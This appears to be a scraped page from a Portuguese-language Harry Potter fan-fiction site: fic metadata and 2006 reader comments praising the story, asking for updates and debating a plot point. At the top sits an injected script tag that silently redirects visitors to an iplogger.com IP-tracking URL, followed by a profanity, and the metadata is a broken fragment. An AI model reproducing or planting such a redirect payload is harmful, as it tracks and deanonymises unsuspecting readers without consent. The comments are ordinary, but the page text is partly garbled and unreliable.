<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>
Foda-se
","headline":"","url":"https://www.floreioseborroes.net/fics/ver/5005","inLanguage":"pt-BR","genre":"Fan fiction","isAccessibleForFree":true,"description":"Essa fic contém spoilers, dicas, pistas, insinuações, palpites e mais sobre Harry Potter and the Half-Blood Prince. Os personagens e o enred","image":"http://storage.msn.com/x1pFUxp6NG29bW3Uy8xnoGhE3lfnFozsOj27OUjuAgYgzcUOsZ6EQx96JvNJhv6aleexlwABNPPtGP-h9pKtxxztqk09YsUIa25GQDUTXGp657FjIUVEwKu0Xleo521HD0yUElEHid32hDdS-q22xqjPg","datePublished":"2005-08-05","dateModified":"2017-04-25","author":{"@type":"Person","name":"Sônia Sag","url":"https://www.floreioseborroes.net/users/ver/3634"},"publisher":{"@type":"Organization","name":"Floreios e Borroes","url":"https://www.floreioseborroes.net"},"aggregateRating":{"@type":"AggregateRating","ratingValue":4.92,"ratingCount":21437,"bestRating":5,"worstRating":1}}
Foda-se
Comentários (2867)
atttttttt
2006-07-09To facinada com sua fic....emocionate demais.... To aqui sentadinha esperando o desfecho. P A R A B É N S________Lê a minha tamb vai? E deixe um recadinho. O pessoal que ta lendo ta gostano.________[]s+{}s
2006-07-08muuuuito bom esse fic!!!! realmente, parabéns pela sua criatividade!!! eu adorei, li ele em tres dias... de taum ansiosa que estava para ver o final! hehehehe tomara que o proximo capitulo saia logo! td d bom pra vc! :o*
2006-07-08INCRIVEL!!!AMEI!! Continua!ATUALIZA RAPIDUH!!!!!H/G 4REVER!!!!!!!!!!!!!!
2006-07-08no capitulo 34 harry desaperata varias vezes para confundir voldemort, mas naum se pode aparatar nem desaparatar nos terrenos de hogwarts
2006-07-08Atualiza vai...to ansiosa....Vc já passou la na minha fic? []s+{}s
2006-07-08posta logo.... tah mto legal.. nao dexa agente na mao nao..... sua fic eh otima!
2006-07-07Olá tenho que dzer que queria muito de dar 5 mias não posso, na verdade não li a história toda só os 7 primeiros capitulos, vc escreve muito bem e tem uma otima visão literaria para detalhes e para desenrolar a hitória, mas acontece q algumas das coisas q vc escreveu estão sem logica no pensamento, não sei se vc me endente por exemplo: Quando fala Belatrix e seus ajudantes seriam facilmente derrotados por um aborto cum uma pedaço de pau na mão,são comensais da morte e provavelmente não cediriam por tres gorotos msm sendo Harry, Rony e Hermione,e a tbm em algumas partes q coisas desse tipo q seriam improvaveis ou quase impossiveis acontem,vou continuar a ler e história, está de parabens pelo trabalho bjus
2006-07-07Se a Sônia não se importa com críticas vazias, melhor para ela. Mas pelo amor de Deus, povo! Vamos pelo menos ler a fic com atenção antes de detonar... Quem pensa que abortos são completos inúteis são seguidores da filosofia "Voldie-Malfoy" de vida, não acham? E mais, há quanto tempo Harry já estaria morto e enterrado se não fosse capaz de enfrentar sequer a louca de bellatriz? Francamente, se é pra ler sem a intenção de gostar, nem percam seu tempo, o da Sônia e o nosso com comentários do tipo...
2006-07-07kd o finaaaaaaaaaaaaaaaaaaaallllllllllllllllllll
2006-07-07